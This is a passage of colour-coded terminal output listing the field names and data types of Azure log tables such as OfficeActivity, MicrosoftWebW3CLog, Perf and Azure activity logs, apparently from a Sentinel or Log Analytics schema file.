\u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AppTags\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"BlockedEvents\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DownloadedBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EnrichedUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StreamName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TotalBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TotalEvents\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UploadedBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"UserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Microservices4SpringApplicationLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AppName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Log\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Stream\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftInsightsAzureActivityLog\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityStatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Authorization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Caller\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Claims\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventDataId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSubmissionTimestamp\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"HTTPRequest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationNameValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProviderValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebApplicationLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CustomLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Host\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Logger\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Method\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Stacktrace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WebSiteInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebFunctionExecutionLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FunctionInvocationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FunctionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebStdOutStdErrLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Host\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebW3CLog\"\u001b[39;49;00m: {\n        \u001b[94m\"CIp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsHost\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsUriStem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"OfficeActivity\"\u001b[39;49;00m: {\n        \u001b[94m\"AADTarget\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Actor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorContextId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AffectedItems\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Application\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureActiveDirectory_EventType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Client\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientInfoString\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Client_IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CrossMailboxOperations\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"CustomEvent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DataCenterSecurityEventType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestFolder\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerMasterAccountSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerUPN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationFileExtension\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationRelativeUrl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EffectiveOrganization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationApprovedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationApprover\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationDuration\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationRole\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Event_Data\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalAccess\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Folder\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Folders\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GenericInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InterSystemsId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InternalLogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"IntraSystemId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Item\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ItemType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoginStatus\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LogonUserDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Logon_Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineDomainInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerMasterAccountSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerUPN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ModifiedObjectResolvedName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ModifiedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeObjectId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeWorkload\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Operation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OrganizationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OrganizationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginatingServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendAsUserMailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendAsUserSmtp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendOnBehalfOfUserSmtp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendonBehalfOfUserMailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SharingType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Site_\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Site_Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFileExtension\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceRelativeUrl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source_Name\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start_Time\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SupportTicketId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetContextId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserKey\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserSharedWith\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Operation\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Detail\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HelpLink\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationCategory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationKey\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solution\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Perf\"\u001b[39;49;00m: {\n        \u001b[94m\"BucketEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"BucketStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterValue\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Max\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Min\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SampleCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StandardDeviation\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ReservedAzureCommonFields\"\u001b[39;49;00m: {\n        \u001b[94m\"Caller_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIP_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientInfo_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientPort_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Direction_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailedRequestCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HealthyHostCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpMethod_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HttpStatusCode_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpStatus_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpVersion_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Id_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JobId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Latency_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MacAddress_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MatchedConnections_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Priority_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ReceivedBytes_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RequestCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RequestQuery_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestUri_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RuleName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RunbookName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SentBytes_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SslEnabled_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StreamType_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubnetPrefix_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Throughput_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeTaken_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        